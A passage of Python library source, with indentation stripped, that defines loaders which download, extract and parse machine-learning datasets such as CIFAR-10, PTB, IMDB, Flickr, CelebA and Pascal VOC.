X_train = np.vstack((X_train, data_dic['data']))
y_train += data_dic['labels']
test_data_dic = unpickle(os.path.join(path, 'cifar-10-batches-py/', "test_batch"))
X_test = test_data_dic['data']
y_test = np.array(test_data_dic['labels'])
if shape == (-1, 3, 32, 32):
X_test = X_test.reshape(shape)
X_train = X_train.reshape(shape)
elif shape == (-1, 32, 32, 3):
X_test = X_test.reshape(shape, order='F')
X_train = X_train.reshape(shape, order='F')
X_test = np.transpose(X_test, (0, 2, 1, 3))
X_train = np.transpose(X_train, (0, 2, 1, 3))
else:
X_test = X_test.reshape(shape)
X_train = X_train.reshape(shape)
y_train = np.array(y_train)
if plotable:
logging.info('\nCIFAR-10')
import matplotlib.pyplot as plt
fig = plt.figure(1)
logging.info('Shape of a training image: X_train[0] %s' % X_train[0].shape)
plt.ion() # interactive mode
count = 1
for _ in range(10): # each row
for _ in range(10): # each column
_ = fig.add_subplot(10, 10, count)
if shape == (-1, 3, 32, 32):
# plt.imshow(X_train[count-1], interpolation='nearest')
plt.imshow(np.transpose(X_train[count - 1], (1, 2, 0)), interpolation='nearest')
# plt.imshow(np.transpose(X_train[count-1], (2, 1, 0)), interpolation='nearest')
elif shape == (-1, 32, 32, 3):
plt.imshow(X_train[count - 1], interpolation='nearest')
# plt.imshow(np.transpose(X_train[count-1], (1, 0, 2)), interpolation='nearest')
else:
raise Exception("Do not support the given 'shape' to plot the image examples")
plt.gca().xaxis.set_major_locator(plt.NullLocator()) # 不显示刻度(tick)
plt.gca().yaxis.set_major_locator(plt.NullLocator())
count = count + 1
plt.draw() # interactive mode
plt.pause(3) # interactive mode
logging.info("X_train: %s" % X_train.shape)
logging.info("y_train: %s" % y_train.shape)
logging.info("X_test: %s" % X_test.shape)
logging.info("y_test: %s" % y_test.shape)
X_train = np.asarray(X_train, dtype=np.float32)
X_test = np.asarray(X_test, dtype=np.float32)
y_train = np.asarray(y_train, dtype=np.int32)
y_test = np.asarray(y_test, dtype=np.int32)
return X_train, y_train, X_test, y_test
def load_ptb_dataset(path='data'):
"""Load Penn TreeBank (PTB) dataset.
It is used in many LANGUAGE MODELING papers,
including "Empirical Evaluation and Combination of Advanced Language
Modeling Techniques", "Recurrent Neural Network Regularization".
It consists of 929k training words, 73k validation words, and 82k test
words. It has 10k words in its vocabulary.
Parameters
----------
path : str
The path that the data is downloaded to, defaults is ``data/ptb/``.
Returns
--------
train_data, valid_data, test_data : list of int
The training, validating and testing data in integer format.
vocab_size : int
The vocabulary size.
Examples
--------
>>> train_data, valid_data, test_data, vocab_size = tl.files.load_ptb_dataset()
References
---------------
- ``tensorflow.models.rnn.ptb import reader``
- `Manual download <http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz>`__
Notes
------
- If you want to get the raw data, see the source code.
"""
path = os.path.join(path, 'ptb')
logging.info("Load or Download Penn TreeBank (PTB) dataset > {}".format(path))
#Maybe dowload and uncompress tar, or load exsisting files
filename = 'simple-examples.tgz'
url = 'http://www.fit.vutbr.cz/~imikolov/rnnlm/'
maybe_download_and_extract(filename, path, url, extract=True)
data_path = os.path.join(path, 'simple-examples', 'data')
train_path = os.path.join(data_path, "ptb.train.txt")
valid_path = os.path.join(data_path, "ptb.valid.txt")
test_path = os.path.join(data_path, "ptb.test.txt")
word_to_id = nlp.build_vocab(nlp.read_words(train_path))
train_data = nlp.words_to_word_ids(nlp.read_words(train_path), word_to_id)
valid_data = nlp.words_to_word_ids(nlp.read_words(valid_path), word_to_id)
test_data = nlp.words_to_word_ids(nlp.read_words(test_path), word_to_id)
vocab_size = len(word_to_id)
# logging.info(nlp.read_words(train_path)) # ... 'according', 'to', 'mr.', '<unk>', '<eos>']
# logging.info(train_data) # ... 214, 5, 23, 1, 2]
# logging.info(word_to_id) # ... 'beyond': 1295, 'anti-nuclear': 9599, 'trouble': 1520, '<eos>': 2 ... }
# logging.info(vocabulary) # 10000
# exit()
return train_data, valid_data, test_data, vocab_size
def load_matt_mahoney_text8_dataset(path='data'):
"""Load Matt Mahoney's dataset.
Download a text file from Matt Mahoney's website
if not present, and make sure it's the right size.
Extract the first file enclosed in a zip file as a list of words.
This dataset can be used for Word Embedding.
Parameters
----------
path : str
The path that the data is downloaded to, defaults is ``data/mm_test8/``.
Returns
--------
list of str
The raw text data e.g. [.... 'their', 'families', 'who', 'were', 'expelled', 'from', 'jerusalem', ...]
Examples
--------
>>> words = tl.files.load_matt_mahoney_text8_dataset()
>>> print('Data size', len(words))
"""
path = os.path.join(path, 'mm_test8')
logging.info("Load or Download matt_mahoney_text8 Dataset> {}".format(path))
filename = 'text8.zip'
url = 'http://mattmahoney.net/dc/'
maybe_download_and_extract(filename, path, url, expected_bytes=31344016)
with zipfile.ZipFile(os.path.join(path, filename)) as f:
word_list = f.read(f.namelist()[0]).split()
for idx, _ in enumerate(word_list):
word_list[idx] = word_list[idx].decode()
return word_list
def load_imdb_dataset(path='data', nb_words=None, skip_top=0, maxlen=None, test_split=0.2, seed=113, start_char=1, oov_char=2, index_from=3):
"""Load IMDB dataset.
Parameters
----------
path : str
The path that the data is downloaded to, defaults is ``data/imdb/``.
nb_words : int
Number of words to get.
skip_top : int
Top most frequent words to ignore (they will appear as oov_char value in the sequence data).
maxlen : int
Maximum sequence length. Any longer sequence will be truncated.
seed : int
Seed for reproducible data shuffling.
start_char : int
The start of a sequence will be marked with this character. Set to 1 because 0 is usually the padding character.
oov_char : int
Words that were cut out because of the num_words or skip_top limit will be replaced with this character.
index_from : int
Index actual words with this index and higher.
Examples
--------
>>> X_train, y_train, X_test, y_test = tl.files.load_imdb_dataset(
... nb_words=20000, test_split=0.2)
>>> print('X_train.shape', X_train.shape)
... (20000,) [[1, 62, 74, ... 1033, 507, 27],[1, 60, 33, ... 13, 1053, 7]..]
>>> print('y_train.shape', y_train.shape)
... (20000,) [1 0 0 ..., 1 0 1]
References
-----------
- `Modified from keras. <https://github.com/fchollet/keras/blob/master/keras/datasets/imdb.py>`__
"""
path = os.path.join(path, 'imdb')
filename = "imdb.pkl"
url = 'https://s3.amazonaws.com/text-datasets/'
maybe_download_and_extract(filename, path, url)
if filename.endswith(".gz"):
f = gzip.open(os.path.join(path, filename), 'rb')
else:
f = open(os.path.join(path, filename), 'rb')
X, labels = cPickle.load(f)
f.close()
np.random.seed(seed)
np.random.shuffle(X)
np.random.seed(seed)
np.random.shuffle(labels)
if start_char is not None:
X = [[start_char] + [w + index_from for w in x] for x in X]
elif index_from:
X = [[w + index_from for w in x] for x in X]
if maxlen:
new_X = []
new_labels = []
for x, y in zip(X, labels):
if len(x) < maxlen:
new_X.append(x)
new_labels.append(y)
X = new_X
labels = new_labels
if not X:
raise Exception('After filtering for sequences shorter than maxlen=' + str(maxlen) + ', no sequence was kept. ' 'Increase maxlen.')
if not nb_words:
nb_words = max([max(x) for x in X])
# by convention, use 2 as OOV word
# reserve 'index_from' (=3 by default) characters: 0 (padding), 1 (start), 2 (OOV)
if oov_char is not None:
X = [[oov_char if (w >= nb_words or w < skip_top) else w for w in x] for x in X]
else:
nX = []
for x in X:
nx = []
for w in x:
if (w >= nb_words or w < skip_top):
nx.append(w)
nX.append(nx)
X = nX
X_train = np.array(X[:int(len(X) * (1 - test_split))])
y_train = np.array(labels[:int(len(X) * (1 - test_split))])
X_test = np.array(X[int(len(X) * (1 - test_split)):])
y_test = np.array(labels[int(len(X) * (1 - test_split)):])
return X_train, y_train, X_test, y_test
def load_nietzsche_dataset(path='data'):
"""Load Nietzsche dataset.
Parameters
----------
path : str
The path that the data is downloaded to, defaults is ``data/nietzsche/``.
Returns
--------
str
The content.
Examples
--------
>>> see tutorial_generate_text.py
>>> words = tl.files.load_nietzsche_dataset()
>>> words = basic_clean_str(words)
>>> words = words.split()
"""
logging.info("Load or Download nietzsche dataset > {}".format(path))
path = os.path.join(path, 'nietzsche')
filename = "nietzsche.txt"
url = 'https://s3.amazonaws.com/text-datasets/'
filepath = maybe_download_and_extract(filename, path, url)
with open(filepath, "r") as f:
words = f.read()
return words
def load_wmt_en_fr_dataset(path='data'):
"""Load WMT'15 English-to-French translation dataset.
It will download the data from the WMT'15 Website (10^9-French-English corpus), and the 2013 news test from the same site as development set.
Returns the directories of training data and test data.
Parameters
----------
path : str
The path that the data is downloaded to, defaults is ``data/wmt_en_fr/``.
References
----------
- Code modified from /tensorflow/models/rnn/translation/data_utils.py
Notes
-----
Usually, it will take a long time to download this dataset.
"""
path = os.path.join(path, 'wmt_en_fr')
# URLs for WMT data.
_WMT_ENFR_TRAIN_URL = "http://www.statmt.org/wmt10/"
_WMT_ENFR_DEV_URL = "http://www.statmt.org/wmt15/"
def gunzip_file(gz_path, new_path):
"""Unzips from gz_path into new_path."""
logging.info("Unpacking %s to %s" % (gz_path, new_path))
with gzip.open(gz_path, "rb") as gz_file:
with open(new_path, "wb") as new_file:
for line in gz_file:
new_file.write(line)
def get_wmt_enfr_train_set(path):
"""Download the WMT en-fr training corpus to directory unless it's there."""
filename = "training-giga-fren.tar"
maybe_download_and_extract(filename, path, _WMT_ENFR_TRAIN_URL, extract=True)
train_path = os.path.join(path, "giga-fren.release2.fixed")
gunzip_file(train_path + ".fr.gz", train_path + ".fr")
gunzip_file(train_path + ".en.gz", train_path + ".en")
return train_path
def get_wmt_enfr_dev_set(path):
"""Download the WMT en-fr training corpus to directory unless it's there."""
filename = "dev-v2.tgz"
dev_file = maybe_download_and_extract(filename, path, _WMT_ENFR_DEV_URL, extract=False)
dev_name = "newstest2013"
dev_path = os.path.join(path, "newstest2013")
if not (gfile.Exists(dev_path + ".fr") and gfile.Exists(dev_path + ".en")):
logging.info("Extracting tgz file %s" % dev_file)
with tarfile.open(dev_file, "r:gz") as dev_tar:
fr_dev_file = dev_tar.getmember("dev/" + dev_name + ".fr")
en_dev_file = dev_tar.getmember("dev/" + dev_name + ".en")
fr_dev_file.name = dev_name + ".fr" # Extract without "dev/" prefix.
en_dev_file.name = dev_name + ".en"
dev_tar.extract(fr_dev_file, path)
dev_tar.extract(en_dev_file, path)
return dev_path
logging.info("Load or Download WMT English-to-French translation > {}".format(path))
train_path = get_wmt_enfr_train_set(path)
dev_path = get_wmt_enfr_dev_set(path)
return train_path, dev_path
def load_flickr25k_dataset(tag='sky', path="data", n_threads=50, printable=False):
"""Load Flickr25K dataset.
Returns a list of images by a given tag from Flick25k dataset,
it will download Flickr25k from `the official website <http://press.liacs.nl/mirflickr/mirdownload.html>`__
at the first time you use it.
Parameters
------------
tag : str or None
What images to return.
- If you want to get images with tag, use string like 'dog', 'red', see `Flickr Search <https://www.flickr.com/search/>`__.
- If you want to get all images, set to ``None``.
path : str
The path that the data is downloaded to, defaults is ``data/flickr25k/``.
n_threads : int
The number of thread to read image.
printable : boolean
Whether to print infomation when reading images, default is ``False``.
Examples
-----------
Get images with tag of sky
>>> images = tl.files.load_flickr25k_dataset(tag='sky')
Get all images
>>> images = tl.files.load_flickr25k_dataset(tag=None, n_threads=100, printable=True)
"""
path = os.path.join(path, 'flickr25k')
filename = 'mirflickr25k.zip'
url = 'http://press.liacs.nl/mirflickr/mirflickr25k/'
# download dataset
if folder_exists(path + "/mirflickr") is False:
logging.info("[*] Flickr25k is nonexistent in {}".format(path))
maybe_download_and_extract(filename, path, url, extract=True)
del_file(path + '/' + filename)
# return images by the given tag.
# 1. image path list
folder_imgs = path + "/mirflickr"
path_imgs = load_file_list(path=folder_imgs, regx='\\.jpg', printable=False)
path_imgs.sort(key=natural_keys)
# 2. tag path list
folder_tags = path + "/mirflickr/meta/tags"
path_tags = load_file_list(path=folder_tags, regx='\\.txt', printable=False)
path_tags.sort(key=natural_keys)
# 3. select images
if tag is None:
logging.info("[Flickr25k] reading all images")
else:
logging.info("[Flickr25k] reading images with tag: {}".format(tag))
images_list = []
for idx, _v in enumerate(path_tags):
tags = read_file(folder_tags + '/' + path_tags[idx]).split('\n')
# logging.info(idx+1, tags)
if tag is None or tag in tags:
images_list.append(path_imgs[idx])
images = visualize.read_images(images_list, folder_imgs, n_threads=n_threads, printable=printable)
return images
def load_flickr1M_dataset(tag='sky', size=10, path="data", n_threads=50, printable=False):
"""Load Flick1M dataset.
Returns a list of images by a given tag from Flickr1M dataset,
it will download Flickr1M from `the official website <http://press.liacs.nl/mirflickr/mirdownload.html>`__
at the first time you use it.
Parameters
------------
tag : str or None
What images to return.
- If you want to get images with tag, use string like 'dog', 'red', see `Flickr Search <https://www.flickr.com/search/>`__.
- If you want to get all images, set to ``None``.
size : int
integer between 1 to 10. 1 means 100k images ... 5 means 500k images, 10 means all 1 million images. Default is 10.
path : str
The path that the data is downloaded to, defaults is ``data/flickr25k/``.
n_threads : int
The number of thread to read image.
printable : boolean
Whether to print infomation when reading images, default is ``False``.
Examples
----------
Use 200k images
>>> images = tl.files.load_flickr1M_dataset(tag='zebra', size=2)
Use 1 Million images
>>> images = tl.files.load_flickr1M_dataset(tag='zebra')
"""
path = os.path.join(path, 'flickr1M')
logging.info("[Flickr1M] using {}% of images = {}".format(size * 10, size * 100000))
images_zip = [
'images0.zip', 'images1.zip', 'images2.zip', 'images3.zip', 'images4.zip', 'images5.zip', 'images6.zip', 'images7.zip', 'images8.zip', 'images9.zip'
]
tag_zip = 'tags.zip'
url = 'http://press.liacs.nl/mirflickr/mirflickr1m/'
# download dataset
for image_zip in images_zip[0:size]:
image_folder = image_zip.split(".")[0]
# logging.info(path+"/"+image_folder)
if folder_exists(path + "/" + image_folder) is False:
# logging.info(image_zip)
logging.info("[Flickr1M] {} is missing in {}".format(image_folder, path))
maybe_download_and_extract(image_zip, path, url, extract=True)
del_file(path + '/' + image_zip)
os.system("mv {} {}".format(path + '/images', path + '/' + image_folder))
else:
logging.info("[Flickr1M] {} exists in {}".format(image_folder, path))
# download tag
if folder_exists(path + "/tags") is False:
logging.info("[Flickr1M] tag files is nonexistent in {}".format(path))
maybe_download_and_extract(tag_zip, path, url, extract=True)
del_file(path + '/' + tag_zip)
else:
logging.info("[Flickr1M] tags exists in {}".format(path))
# 1. image path list
images_list = []
images_folder_list = []
for i in range(0, size):
images_folder_list += load_folder_list(path=os.path.join(path, 'images%d' % i))
images_folder_list.sort(key=lambda s: int(s.split('/')[-1])) # folder/images/ddd
for folder in images_folder_list[0:size * 10]:
tmp = load_file_list(path=folder, regx='\\.jpg', printable=False)
tmp.sort(key=lambda s: int(s.split('.')[-2])) # ddd.jpg
images_list.extend([folder + '/' + x for x in tmp])
# 2. tag path list
tag_list = []
tag_folder_list = load_folder_list(path + "/tags")
tag_folder_list.sort(key=lambda s: int(s.split('/')[-1])) # folder/images/ddd
for folder in tag_folder_list[0:size * 10]:
tmp = load_file_list(path=folder, regx='\\.txt', printable=False)
tmp.sort(key=lambda s: int(s.split('.')[-2])) # ddd.txt
tmp = [folder + '/' + s for s in tmp]
tag_list += tmp
# 3. select images
logging.info("[Flickr1M] searching tag: {}".format(tag))
select_images_list = []
for idx, _val in enumerate(tag_list):
tags = read_file(tag_list[idx]).split('\n')
if tag in tags:
select_images_list.append(images_list[idx])
logging.info("[Flickr1M] reading images with tag: {}".format(tag))
images = visualize.read_images(select_images_list, '', n_threads=n_threads, printable=printable)
return images
def load_cyclegan_dataset(filename='summer2winter_yosemite', path='data'):
"""Load images from CycleGAN's database, see `this link <https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/>`__.
Parameters
------------
filename : str
The dataset you want, see `this link <https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/>`__.
path : str
The path that the data is downloaded to, defaults is `data/cyclegan`
Examples
---------
>>> im_train_A, im_train_B, im_test_A, im_test_B = load_cyclegan_dataset(filename='summer2winter_yosemite')
"""
path = os.path.join(path, 'cyclegan')
url = 'https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/'
if folder_exists(os.path.join(path, filename)) is False:
logging.info("[*] {} is nonexistent in {}".format(filename, path))
maybe_download_and_extract(filename + '.zip', path, url, extract=True)
del_file(os.path.join(path, filename + '.zip'))
def load_image_from_folder(path):
path_imgs = load_file_list(path=path, regx='\\.jpg', printable=False)
return visualize.read_images(path_imgs, path=path, n_threads=10, printable=False)
im_train_A = load_image_from_folder(os.path.join(path, filename, "trainA"))
im_train_B = load_image_from_folder(os.path.join(path, filename, "trainB"))
im_test_A = load_image_from_folder(os.path.join(path, filename, "testA"))
im_test_B = load_image_from_folder(os.path.join(path, filename, "testB"))
def if_2d_to_3d(images): # [h, w] --> [h, w, 3]
for i, _v in enumerate(images):
if len(images[i].shape) == 2:
images[i] = images[i][:, :, np.newaxis]
images[i] = np.tile(images[i], (1, 1, 3))
return images
im_train_A = if_2d_to_3d(im_train_A)
im_train_B = if_2d_to_3d(im_train_B)
im_test_A = if_2d_to_3d(im_test_A)
im_test_B = if_2d_to_3d(im_test_B)
return im_train_A, im_train_B, im_test_A, im_test_B
def download_file_from_google_drive(ID, destination):
"""Download file from Google Drive.
See ``tl.files.load_celebA_dataset`` for example.
Parameters
--------------
ID : str
The driver ID.
destination : str
The destination for save file.
"""
from tqdm import tqdm
import requests
def save_response_content(response, destination, chunk_size=32 * 1024):
total_size = int(response.headers.get('content-length', 0))
with open(destination, "wb") as f:
for chunk in tqdm(response.iter_content(chunk_size), total=total_size, unit='B', unit_scale=True, desc=destination):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params={'id': ID}, stream=True)
token = get_confirm_token(response)
if token:
params = {'id': ID, 'confirm': token}
response = session.get(URL, params=params, stream=True)
save_response_content(response, destination)
def load_celebA_dataset(path='data'):
"""Load CelebA dataset
Return a list of image path.
Parameters
-----------
path : str
The path that the data is downloaded to, defaults is ``data/celebA/``.
"""
data_dir = 'celebA'
filename, drive_id = "img_align_celeba.zip", "0B7EVK8r0v71pZjFTYXZWM3FlRnM"
save_path = os.path.join(path, filename)
image_path = os.path.join(path, data_dir)
if os.path.exists(image_path):
logging.info('[*] {} already exists'.format(save_path))
else:
exists_or_mkdir(path)
download_file_from_google_drive(drive_id, save_path)
zip_dir = ''
with zipfile.ZipFile(save_path) as zf:
zip_dir = zf.namelist()[0]
zf.extractall(path)
os.remove(save_path)
os.rename(os.path.join(path, zip_dir), image_path)
data_files = load_file_list(path=image_path, regx='\\.jpg', printable=False)
for i, _v in enumerate(data_files):
data_files[i] = os.path.join(image_path, data_files[i])
return data_files
def load_voc_dataset(path='data', dataset='2012', contain_classes_in_person=False):
"""Pascal VOC 2007/2012 Dataset.
It has 20 objects:
aeroplane, bicycle, bird, boat, bottle, bus, car, cat, chair, cow, diningtable, dog, horse, motorbike, person, pottedplant, sheep, sofa, train, tvmonitor
and additional 3 classes : head, hand, foot for person.
Parameters
-----------
path : str
The path that the data is downloaded to, defaults is ``data/VOC``.
dataset : str
The VOC dataset version, `2012`, `2007`, `2007test` or `2012test`. We usually train model on `2007+2012` and test it on `2007test`.
contain_classes_in_person : boolean
Whether include head, hand and foot annotation, default is False.
Returns
---------
imgs_file_list : list of str
Full paths of all images.
imgs_semseg_file_list : list of str
Full paths of all maps for semantic segmentation. Note that not all images have this map!
imgs_insseg_file_list : list of str
Full paths of all maps for instance segmentation. Note that not all images have this map!
imgs_ann_file_list : list of str
Full paths of all annotations for bounding box and object class, all images have this annotations.
classes : list of str
Classes in order.
classes_in_person : list of str
Classes in person.
classes_dict : dictionary
Class label to integer.
n_objs_list : list of int
Number of objects in all images in ``imgs_file_list`` in order.
objs_info_list : list of str
Darknet format for the annotation of all images in ``imgs_file_list`` in order. ``[class_id x_centre y_centre width height]`` in ratio format.
objs_info_dicts : dictionary
The annotation of all images in ``imgs_file_list``, ``{imgs_file_list : dictionary for annotation}``,
format from `TensorFlow/Models/object-detection <https://github.com/tensorflow/models/blob/master/object_detection/create_pascal_tf_record.py>`__.
Examples
----------
>>> imgs_file_list, imgs_semseg_file_list, imgs_insseg_file_list, imgs_ann_file_list,
>>> classes, classes_in_person, classes_dict,
>>> n_objs_list, objs_info_list, objs_info_dicts = tl.files.load_voc_dataset(dataset="2012", contain_classes_in_person=False)
>>> idx = 26
>>> print(classes)
... ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
>>> print(classes_dict)
... {'sheep': 16, 'horse': 12, 'bicycle': 1, 'bottle': 4, 'cow': 9, 'sofa': 17, 'car': 6, 'dog': 11, 'cat': 7, 'person': 14, 'train': 18, 'diningtable': 10, 'aeroplane': 0, 'bus': 5, 'pottedplant': 15, 'tvmonitor': 19, 'chair': 8, 'bird': 2, 'boat': 3, 'motorbike': 13}
>>> print(imgs_file_list[idx])
... data/VOC/VOC2012/JPEGImages/2007_000423.jpg
>>> print(n_objs_list[idx])
... 2
>>> print(imgs_ann_file_list[idx])
... data/VOC/VOC2012/Annotations/2007_000423.xml
>>> print(objs_info_list[idx])
... 14 0.173 0.461333333333 0.142 0.496
... 14 0.828 0.542666666667 0.188 0.594666666667
>>> ann = tl.prepro.parse_darknet_ann_str_to_list(objs_info_list[idx])
>>> print(ann)
... [[14, 0.173, 0.461333333333, 0.142, 0.496], [14, 0.828, 0.542666666667, 0.188, 0.594666666667]]
>>> c, b = tl.prepro.parse_darknet_ann_list_to_cls_box(ann)
>>> print(c, b)
... [14, 14] [[0.173, 0.461333333333, 0.142, 0.496], [0.828, 0.542666666667, 0.188, 0.594666666667]]
References
-------------
- `Pascal VOC2012 Website <http://host.robots.ox.ac.uk/pascal/VOC/voc2012/#devkit>`__.
- `Pascal VOC2007 Website <http://host.robots.ox.ac.uk/pascal/VOC/voc2007/>`__.
"""
path = os.path.join(path, 'VOC')
def _recursive_parse_xml_to_dict(xml):
"""Recursively parses XML contents to python dict.
We assume that `object` tags are the only ones that can appear
multiple times at the same level of a tree.
Args:
xml: xml tree obtained by parsing XML file contents using lxml.etree
Returns:
Python dictionary holding XML contents.
"""
if not xml:
# if xml is not None:
return {xml.tag: xml.text}
result = {}
for child in xml:
child_result = _recursive_parse_xml_to_dict(child)
if child.tag != 'object':
result[child.tag] = child_result[child.tag]
else:
if child.tag not in result:
result[child.tag] = []
result[child.tag].append(child_result[child.tag])
return {xml.tag: result}
from lxml import etree # pip install lxml
import xml.etree.ElementTree as ET
if dataset == "2012":
url = "http://host.robots.ox.ac.uk/pascal/VOC/voc2012/"
tar_filename = "VOCtrainval_11-May-2012.tar"
extracted_filename = "VOC2012" #"VOCdevkit/VOC2012"
logging.info(" [============= VOC 2012 =============]")
elif dataset == "2012test":
extracted_filename = "VOC2012test" #"VOCdevkit/VOC2012"
logging.info(" [============= VOC 2012 Test Set =============]")
logging.info(" \nAuthor: 2012test only have person annotation, so 2007test is highly recommended for testing !\n")
import time
time.sleep(3)
if os.path.isdir(os.path.join(path, extracted_filename)) is False:
logging.info("For VOC 2012 Test data - online registration required")
logging.info(
" Please download VOC2012test.tar from: \n register: http://host.robots.ox.ac.uk:8080 \n voc2012 : http://host.robots.ox.ac.uk:8080/eval/challenges/voc2012/ \ndownload: http://host.robots.ox.ac.uk:8080/eval/downloads/VOC2012test.tar"
)
logging.info(" unzip VOC2012test.tar,rename the folder to VOC2012test and put it into %s" % path)
exit()
# # http://host.robots.ox.ac.uk:8080/eval/downloads/VOC2012test.tar
# url = "http://host.robots.ox.ac.uk:8080/eval/downloads/"
# tar_filename = "VOC2012test.tar"
elif dataset == "2007":
url = "http://host.robots.ox.ac.uk/pascal/VOC/voc2007/"
tar_filename = "VOCtrainval_06-Nov-2007.tar"
extracted_filename = "VOC2007"
logging.info(" [============= VOC 2007 =============]")
elif dataset == "2007test":
# http://host.robots.ox.ac.uk/pascal/VOC/voc2007/index.html#testdata
# http://host.robots.ox.ac.uk/pascal/VOC/voc2007/VOCtest_06-Nov-2007.tar
url = "http://host.robots.ox.ac.uk/pascal/VOC/voc2007/"
tar_filename = "VOCtest_06-Nov-2007.tar"
extracted_filename = "VOC2007test"
logging.info(" [============= VOC 2007 Test Set =============]")
else:
raise Exception("Please set the dataset aug to 2012, 2012test or 2007.")
# download dataset
if dataset != "2012test":
from sys import platform as _platform
if folder_exists(os.path.join(path, extracted_filename)) is False:
logging.info("[VOC] {} is nonexistent in {}".format(extracted_filename, path))
maybe_download_and_extract(tar_filename, path, url, extract=True)
del_file(os.path.join(path, tar_filename))
if dataset == "2012":
if _platform == "win32":
os.system("mv {}\VOCdevkit\VOC2012 {}\VOC2012".format(path, path))
else:
os.system("mv {}/VOCdevkit/VOC2012 {}/VOC2012".format(path, path))
elif dataset == "2007":
if _platform == "win32":
os.system("mv {}\VOCdevkit\VOC2007 {}\VOC2007".format(path, path))
else:
os.system("mv {}/VOCdevkit/VOC2007 {}/VOC2007".format(path, path))
elif dataset == "2007test":
if _platform == "win32":
os.system("mv {}\VOCdevkit\VOC2007 {}\VOC2007test".format(path, path))
else:
os.system("mv {}/VOCdevkit/VOC2007 {}/VOC2007test".format(path, path))
del_folder(os.path.join(path, 'VOCdevkit'))
# object classes(labels) NOTE: YOU CAN CUSTOMIZE THIS LIST
classes = [
"aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person",
"pottedplant", "sheep", "sofa", "train", "tvmonitor"
]
if contain_classes_in_person:
classes_in_person = ["head", "hand", "foot"]
else:
classes_in_person = []
classes += classes_in_person # use extra 3 classes for person
classes_dict = utils.list_string_to_dict(classes)
logging.info("[VOC] object classes {}".format(classes_dict))
# 1. image path list
# folder_imgs = path+"/"+extracted_filename+"/JPEGImages/"
folder_imgs = os.path.join(path, extracted_filename, "JPEGImages")
imgs_file_list = load_file_list(path=folder_imgs, regx='\\.jpg', printable=False)
logging.info("[VOC] {} images found".format(len(imgs_file_list)))
imgs_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2])) # 2007_000027.jpg --> 2007000027
imgs_file_list = [os.path.join(folder_imgs, s) for s in imgs_file_list]
# logging.info('IM',imgs_file_list[0::3333], imgs_file_list[-1])
if dataset != "2012test":
##======== 2. semantic segmentation maps path list
# folder_semseg = path+"/"+extracted_filename+"/SegmentationClass/"
folder_semseg = os.path.join(path, extracted_filename, "SegmentationClass")
imgs_semseg_file_list = load_file_list(path=folder_semseg, regx='\\.png', printable=False)
logging.info("[VOC] {} maps for semantic segmentation found".format(len(imgs_semseg_file_list)))
imgs_semseg_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2])) # 2007_000032.png --> 2007000032
imgs_semseg_file_list = [os.path.join(folder_semseg, s) for s in imgs_semseg_file_list]
# logging.info('Semantic Seg IM',imgs_semseg_file_list[0::333], imgs_semseg_file_list[-1])
##======== 3. instance segmentation maps path list
# folder_insseg = path+"/"+extracted_filename+"/SegmentationObject/"
folder_insseg = os.path.join(path, extracted_filename, "SegmentationObject")
imgs_insseg_file_list = load_file_list(path=folder_insseg, regx='\\.png', printable=False)
logging.info("[VOC] {} maps for instance segmentation found".format(len(imgs_semseg_file_list)))
imgs_insseg_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2])) # 2007_000032.png --> 2007000032
imgs_insseg_file_list = [os.path.join(folder_insseg, s) for s in imgs_insseg_file_list]
# logging.info('Instance Seg IM',imgs_insseg_file_list[0::333], imgs_insseg_file_list[-1])
else:
imgs_semseg_file_list = []
imgs_insseg_file_list = []
# 4. annotations for bounding box and object class
# folder_ann = path+"/"+extracted_filename+"/Annotations/"
folder_ann = os.path.join(path, extracted_filename, "Annotations")
imgs_ann_file_list = load_file_list(path=folder_ann, regx='\\.xml', printable=False)
logging.info("[VOC] {} XML annotation files for bounding box and object class found".format(len(imgs_ann_file_list)))
imgs_ann_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2])) # 2007_000027.xml --> 2007000027
imgs_ann_file_list = [os.path.join(folder_ann, s) for s in imgs_ann_file_list]
# logging.info('ANN',imgs_ann_file_list[0::3333], imgs_ann_file_list[-1])
if dataset == "2012test": # remove unused images in JPEG folder
imgs_file_list_new = []
for ann in imgs_ann_file_list:
ann = os.path.split(ann)[-1].split('.')[0]
for im in imgs_file_list:
if ann in im:
imgs_file_list_new.append(im)
break
imgs_file_list = imgs_file_list_new
logging.info("[VOC] keep %d images" % len(imgs_file_list_new))
# parse XML annotations
def convert(size, box):
dw = 1. / size[0]
dh = 1. / size[1]
x = (box[0] + box[1]) / 2.0
y = (box[2] + box[3]) / 2.0
w = box[1] - box[0]
h = box[3] - box[2]
x = x * dw
w = w * dw
y = y * dh
h = h * dh
return x, y, w, h
def convert_annotation(file_name):
"""Given VOC2012 XML Annotations, returns number of objects and info."""
in_file = open(file_name)
out_file = ""
tree = ET.parse(in_file)
root = tree.getroot()
size = root.find('size')
w = int(size.find('width').text)
h = int(size.find('height').text)
n_objs = 0
for obj in root.iter('object'):
if dataset != "2012test":
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult) == 1:
continue
else:
cls = obj.find('name').text
if cls not in classes:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
bb = convert((w, h), b)
out_file += str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n'
n_objs += 1
if cls in "person":
for part in obj.iter('part'):
cls = part.find('name').text
if cls not in classes_in_person:
continue
cls_id = classes.index(cls)
xmlbox = part.find('bndbox')
